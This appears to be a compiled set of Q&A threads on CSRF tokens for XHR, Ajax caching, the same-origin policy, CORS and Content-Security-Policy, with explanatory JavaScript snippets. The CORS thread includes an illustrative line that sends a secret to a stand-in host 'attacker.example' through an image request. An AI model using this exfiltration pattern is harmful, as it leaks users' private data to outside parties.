CSRF prevention for XHR requests - javascript

I just learned about the details of CSRF prevention. In our application, all "writing" requests are made using XHR. Not a single form is actually submitted in the whole page; everything is done via XHR.
For this scenario, Wikipedia suggests the Cookie-to-Header Token pattern: some random value is stored in a cookie during login (or at some other point in time). When making an XHR request, this value is copied into a custom HTTP header (e.g. "X-Csrf-Token"), which is then checked by the server.
Now I am wondering whether the random value is actually necessary at all in this scenario. I think it should be enough to just set a custom header like "X-Anti-Csrf: true". That seems a lot more robust than dragging a random value around. But does this open any security holes?

It depends on how many risky assumptions you want to make.
- you have properly configured your CORS headers,
- the user's browser respects them,
- so there is no way a malicious site can send an XHR to your domain,
- and an XHR is the only way to send custom headers with a request.
If you believe in all that, sure, a fixed custom header will work.
If you remove any of the assumptions, then your method fails.
If you make the header value impossible to guess, then you don't need to make those assumptions. You're still relying on the assumption that the value of that header can't be intercepted and duplicated by a third party (there's TLS for that).
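To illustrate the cookie-to-header pattern under discussion, here is a minimal sketch. The cookie name `csrf_token`, the header name `X-Csrf-Token`, and the `/api/update` URL are placeholders for illustration, not names from the original discussion:

```javascript
// Read a named cookie value from a cookie string
// (in a browser, pass document.cookie).
function getCookie(cookieString, name) {
  for (const part of cookieString.split('; ')) {
    const eq = part.indexOf('=');
    if (part.slice(0, eq) === name) {
      return decodeURIComponent(part.slice(eq + 1));
    }
  }
  return null;
}

// In the browser, copy the token into a custom header on every write request:
//   fetch('/api/update', {
//     method: 'POST',
//     headers: { 'X-Csrf-Token': getCookie(document.cookie, 'csrf_token') },
//     body: JSON.stringify(payload),
//   });
```

The server then compares the header value against the cookie value (or a server-side copy); a cross-site attacker can cause the cookie to be *sent* but cannot *read* it, so it cannot forge the header.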

Related

Should Ajax actions REALLY have a separate URL?

Every now and then I hear the opinion that having the same URL for non-Ajax and Ajax actions is bad.
On my app, I have forms that are sent with Ajax for a better user experience. For people who disable JavaScript, my forms work too. The same goes for some of my links. I used to have the same URL for both and just serve the appropriate content and Content-Type, according to whether it's an Ajax call or not. This caused a problem with Google Chrome: Laravel 5 and weird bug: curly braces on back
My question now is: is it REALLY a bad idea to have the same URL for Ajax and non-Ajax actions? It's painful to make two separate URLs for each of those actions. Or maybe there is a good workaround to manage caching? In theory, one header can change the behavior entirely, so I don't see why I should create an extra layer in my app and force the same action to have separate URLs.
Please share your opinions.
HTTP is flexible and allows you to design resources the way you want. You design the APIs, and design comes down to personal preference. But in this case, having one resource that responds to different types of request is absolutely fine. This is why HTTP headers like Content-Type exist.
And for caching you can use the HTTP ETag header. It's a caching header that forces the client to validate cached resources before using them.
The ETag or entity tag is part of HTTP, the protocol for the World Wide Web. It is one of several mechanisms that HTTP provides for web cache validation, which allows a client to make conditional requests. This allows caches to be more efficient, and saves bandwidth, as a web server does not need to send a full response if the content has not changed.
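The validation step the ETag mechanism implies can be sketched framework-agnostically; the shape of the returned response object here is made up for illustration:

```javascript
// Compare the client's If-None-Match header with the resource's current tag.
// A match means the cached copy is still valid: send 304 with no body.
function etagResponse(currentEtag, ifNoneMatch) {
  if (ifNoneMatch && ifNoneMatch === currentEtag) {
    return { status: 304, body: null }; // client reuses its cached copy
  }
  return { status: 200, body: 'full response', headers: { ETag: currentEtag } };
}
```

Since the tag can incorporate whether the response was rendered for an Ajax or non-Ajax request, the same URL can safely serve both variants.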

Setting request header, in a URL?

We have a webservice that is mainly intended to be called from JavaScript, via jQuery's $.ajax(). When we call methods from JavaScript, we set a security token in a request header. If it's not there, or if it doesn't validate, we return an unauthorized error.
And that's all working fine.
But now we're faced with returning image files. So instead of having javascript call $.ajax(), we're embedding an image tag in the DOM:
<img src='http://mywebservice/imagescontroller/getAnImage?imageid=123'/>
And when we do that, we don't have our security token in the request header. I can think of two "easy" fixes: 1) simply allow anonymous access to our image URLs, or 2) pass the security token as a URL parameter.
The first choice is, of course, not a good idea. The second is straightforward enough. But before I settle on this approach, I was wondering if there was some easy way of setting request headers on these sorts of requests, that I was missing.
Ideas?
Easy fix: use session cookies. A session cookie is a cookie without an expiry date. It is automatically transmitted with each request and goes away as soon as the user closes the browser, or when you delete the cookie via JavaScript.
You simply store your token there and get it delivered to your server code for free.
Have some demo stuff here:
How do I set/unset cookie with jQuery?
If you run the services on another domain, you will need to use CORS to make the AJAX work - otherwise your AJAX will run into the Same-Origin Policy. With CORS you can even make the cookies work.
See here: CORS request - why are the cookies not sent?
If you do not want to use CORS, you could also incorporate the service domain into your own via reverse proxying. This solves the SOP problem as well as making the use of cookies possible. Setting up a reverse proxy within Apache is pretty straightforward.
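As a rough sketch of the session-cookie approach (the `authToken` name is a placeholder): a cookie becomes a session cookie simply by omitting the Expires/Max-Age attribute.

```javascript
// Build a session-cookie string: no Expires/Max-Age means the cookie
// lives only until the browser is closed.
function sessionCookie(name, value, path = '/') {
  return encodeURIComponent(name) + '=' + encodeURIComponent(value) +
    '; path=' + path;
}

// In the browser:
//   document.cookie = sessionCookie('authToken', token);
// After that, requests triggered by <img src='http://mywebservice/...'>
// carry the cookie automatically, with no custom header needed.
```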

Using a client's IP to get content

I'm a bit embarrassed here because I am trying to get content remotely, by using the client's browser and not the server. But I have specifications which make it look impossible to me, I literally spent all day on it with no success.
The data I need to fetch is on a distant server.
I don't own this server (I can't do any modification to it).
It's a string, and I need to get it and pass it to PHP.
It must be the client's (the user browsing the website) browser that actually gets the data (it needs to be the client's IP, not the server's).
And with the cross-domain policy I don't seem to be able to get around it. I already knew about it, but still tried a simple Ajax query, which failed. Then I thought "why not use iframes", but the same limitation seems to apply to them too. I then read about using YQL (http://developer.yahoo.com/yql/) but I noticed the server I was trying to reach blocked YQL's user agent, making this technique impossible to use.
So, that's all I could think of or find. But I can't believe it's not possible to achieve such a thing; it doesn't even look hard...
Oh, and my JavaScript knowledge is very basic, which doesn't help either.
This is one reason that the same-origin policy exists. You're trying to have your webpage access data on a different server, without the user knowing, and without having "permission" from the other server to do so.
Without establishing a two-way trust system (i.e. modifying the 'other' server), I believe this is not possible.
Even with new xhr and crossdomain support, two-way trust is still required for the communication to work.
You could consider a fat-client approach, or try #selbie's suggestion and require manual user interaction.
The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from a different origin.
-- From http://www.mozilla.org/projects/security/components/same-origin.html
Now if you wish to do some hackery to get it... visit this site
Note: I have never tried any of the methods on the aforementioned site and cannot guarantee their success
I can only see a really ugly solution: iframes. This article contains some good information to start with.
You could do it with a Flash application and a crossdomain.xml file (won't help here, though, since you don't control the other server).
In newer browsers there is CORS - it requires the Access-Control-Allow-Origin header to be set on the server side.
You could also try to use JSONP (but I think that won't work either, since you don't own the other server).
I think you need to bite the bullet and find some other way to get the content (on the server side for example).

Why cache AJAX with jQuery?

I use jQuery for AJAX. My question is simple - why cache AJAX? At work and in every tutorial I read, they always say to set caching to false. What happens if you don't? Will the server "store" such requests and get "clogged up"? I can find no good answer anywhere - just links telling you how to set caching to false!
It's not that the server stores requests (though it may do some caching of its own, especially on higher-volume sites, as SO does for anonymous users).
The issue is that the browser will store the response it gets if instructed to (or in IE's case, even when it's not instructed to). Basically you set cache: false if you don't want the user's browser to show stale data it fetched, say, X minutes ago.
If it helps, look at what cache: false does: it appends something like _=190237921749817243 as a query-string pair. The actual value is the current timestamp, so it's always unique. This forces the browser to make the request to the server again, since it doesn't know what that query string means - it may be a different page, and since it can't know or be sure, it has to fetch again.
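What jQuery does under the hood can be sketched in a few lines (a simplified approximation for illustration, not jQuery's actual implementation):

```javascript
// Append a unique "_=<timestamp>" query-string pair so each request URL is
// distinct, which prevents the browser from serving a cached response.
function bustCache(url) {
  const sep = url.includes('?') ? '&' : '?';
  return url + sep + '_=' + Date.now();
}

// bustCache('/api/data')     -> '/api/data?_=1700000000000'  (timestamp varies)
// bustCache('/api/data?x=1') -> '/api/data?x=1&_=1700000000000'
```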
The server won't cache the requests, the browser will. Remember that browsers are built to display pages quickly, so they have a cache that maps URLs to the results last returned by those URLs. Ajax requests are URLs returning results, so they could also be cached.
But usually, Ajax requests are meant to do something, so you don't want to skip them, even if they look like the same URL as a previous request.
If the browser cached Ajax requests, you'd have stale responses, and server actions being skipped.
If you don't turn it off, you'll have issues trying to figure out why your AJAX works but your functions aren't responding as you'd like them to. Forced re-validation at the header level is probably the best way to get un-cached data from AJAX.
Here's a hypothetical scenario. Say you want the user to be able to click any word on your page and see a tooltip with the definition for that word. The definition is not going to change, so it's fine to cache it.
The main problem with caching requests in any kind of dynamic environment is that you'll get stale data back some of the time. And it can be unpredictable when you'll get a 'fresh' pull vs. a cached pull.
If you're pulling static content via AJAX, you could maybe leave caching on, but how sure are you that you'll never want to change that fetched content?
The problem is, as always, Internet Explorer. IE will usually cache the whole request. So if you repeatedly fire the same AJAX request, IE will only perform it once and always show the first result (even though subsequent requests could return different results).
The browser caches the information, not the server. The point of using Ajax is usually that you're going to be getting information that changes. If there's a part of a website you know isn't going to change, you don't bother fetching it more than once (in which case caching is ok); that's the beauty of Ajax. Since you should only be dealing with information that may be changing, you want to get the new information. Therefore, you don't want the browser to cache.
For example, Gmail uses Ajax. If caching were simply left on, you wouldn't see your new e-mail for quite a while, which would be bad.

Cross-Origin Resource Sharing (CORS) - am I missing something here?

I was reading about CORS and I think the implementation is both simple and effective.
However, unless I'm missing something, I think there's a big part missing from the spec. As I understand it, it's the foreign site that decides, based on the origin of the request (and optionally including credentials), whether to allow access to its resources. This is fine.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site? The foreign site is obviously going to authenticate the request. Hence, again if I'm not missing something, CORS actually makes it easier to steal sensitive information.
I think it would have made much more sense if the original site could also supply an immutable list of servers its page is allowed to access.
So the expanded sequence would be:
Supply a page with list of acceptable CORS servers (abc.com, xyz.com, etc)
Page wants to make an XHR request to abc.com - the browser allows this because it's in the allowed list and authentication proceeds as normal
Page wants to make an XHR request to malicious.com - request rejected locally (ie by the browser) because the server is not in the list.
I know that malicious code could still use JSONP to do its dirty work, but I would have thought that a complete implementation of CORS would imply the closing of the script tag multi-site loophole.
I also checked out the official CORS spec (http://www.w3.org/TR/cors) and could not find any mention of this issue.
But what if malicious code on the page wants to POST a user's sensitive information to a foreign site?
What about it? You can already do that without CORS. Even as far back as Netscape 2, you have always been able to transfer information to any third-party site through simple GET and POST requests, caused by interfaces as simple as form.submit(), new Image, or setting window.location.
If malicious code has access to sensitive information, you have already totally lost.
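To make the point concrete, here is a minimal sketch of the pre-CORS exfiltration channel this answer mentions (the `attacker.example` host is a placeholder):

```javascript
// Build the exfiltration URL: the secret rides along as a query parameter
// on an ordinary cross-origin GET, which the same-origin policy never blocked.
function exfilUrl(base, secret) {
  return base + '?data=' + encodeURIComponent(secret);
}

// In a browser, one line sends the data cross-origin with no CORS involved:
//   new Image().src = exfilUrl('https://attacker.example/log', secret);
```

The attacker never needs to read the response; merely causing the request delivers the data, which is why CORS does not make this problem any worse.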
3) Page wants to make an XHR request to malicious.com - request rejected locally
Why would a page try to make an XHR request to a site it has not already whitelisted?
If you are trying to protect against the actions of malicious script injected due to XSS vulnerabilities, you are attempting to fix the symptom, not the cause.
Your worries are completely valid.
However, more worrisome is the fact that there doesn't need to be any malicious code present for this to be taken advantage of. There are a number of DOM-based cross-site scripting vulnerabilities that allow attackers to take advantage of the issue you described and insert malicious JavaScript into vulnerable webpages. The issue is more than just where data can be sent, but where data can be received from.
I talk about this in more detail here:
http://isisblogs.poly.edu/2011/06/22/cross-origin-resource-inclusion/
http://files.meetup.com/2461862/Cross-Origin%20Resource%20Inclusion%20-%20Revision%203.pdf
It seems to me that CORS is purely expanding what is possible, and trying to do it securely. I think this is clearly a conservative move. Making the cross-domain policy on other tags (script/image) stricter would be more secure, but it would break a lot of existing code and make it much more difficult to adopt the new technology. Hopefully, something will be done to close that security hole, but I think they need to make sure it's an easy transition first.
I also checked out the official CORS spec and could not find any mention of this issue.
Right. The CORS specification is solving a completely different problem. You're mistaken that it makes the problem worse - it makes the problem neither better nor worse, because once a malicious script is running on your page it can already send the data anywhere.
The good news, though, is that there is a widely-implemented specification that addresses this problem: the Content-Security-Policy. It allows you to instruct the browser to place limits on what your page can do.
For example, you can tell the browser not to execute any inline scripts, which will immediately defeat many XSS attacks. Or, as you've requested here, you can explicitly tell the browser which domains the page is allowed to contact.
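As a hedged sketch, a CSP header covering the abc.com/xyz.com whitelist from the question could be assembled like this (the exact directives depend on your needs; this helper is purely illustrative):

```javascript
// Build a Content-Security-Policy value whose connect-src directive limits
// which origins the page may contact via XHR/fetch.
function cspHeader(allowedConnectOrigins) {
  return "default-src 'self'; connect-src 'self' " +
    allowedConnectOrigins.join(' ');
}

// A server would send the result as a response header, e.g.:
//   Content-Security-Policy: default-src 'self'; connect-src 'self' https://abc.com https://xyz.com
```

With that header in place, an XHR to malicious.com is rejected locally by the browser, which is exactly the expanded sequence the question proposes.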
The problem isn't that a site can access another site's resources that it already had access to. The problem is one of domain: if I'm using a browser at my company, and an Ajax script maliciously decides to try 10.0.0.1 (potentially my gateway), it may have access simply because the request is now coming from my computer (perhaps 10.0.0.2).
So the solution: CORS. I'm not saying it's the best, but it solves this issue.
1) If the gateway can't return the 'bobthehacker.com' accepted-origin header, the request is rejected by the browser. This handles old or unprepared servers.
2) If the gateway only allows items from the myinternaldomain.com domain, it will reject an Origin of 'bobthehacker.com'. In the simple CORS case it will actually still return the results by default; you can configure the server to not even do that. The results are then discarded by the browser without being exposed to the page.
3) Finally, even if it would accept certain domains, you have some control over which headers are accepted and rejected, to make the requests from those sites conform to a certain shape.
Note: the Origin header and the OPTIONS preflight are controlled by the requester; obviously someone crafting their own HTTP request can put whatever they want in there. However, a modern CORS-compliant browser won't do that. It is the browser that controls the interaction, and the browser is what prevents bobthehacker.com from accessing the gateway. That is the part you are missing.
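The server-side half of that decision can be sketched as a tiny origin check (a simplified model for illustration, not a full CORS implementation; preflight handling is omitted):

```javascript
// Echo Access-Control-Allow-Origin only for whitelisted origins; for any
// other origin, send no CORS headers and let the browser discard the result.
function corsHeaders(requestOrigin, whitelist) {
  if (whitelist.includes(requestOrigin)) {
    return { 'Access-Control-Allow-Origin': requestOrigin };
  }
  return {}; // browser blocks the page from reading this response
}
```

The enforcement still happens in the browser: the server merely declares which origins it trusts, and a compliant browser refuses to expose the response when the declaration doesn't match.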
I share David's concerns.
Security must be built layer by layer and a white list served by the origin server seems to be a good approach.
Plus, this white list could be used to close existing loopholes (forms, script tags, etc.); it's safe to assume that a server serving such a white list is designed to avoid backward-compatibility issues.
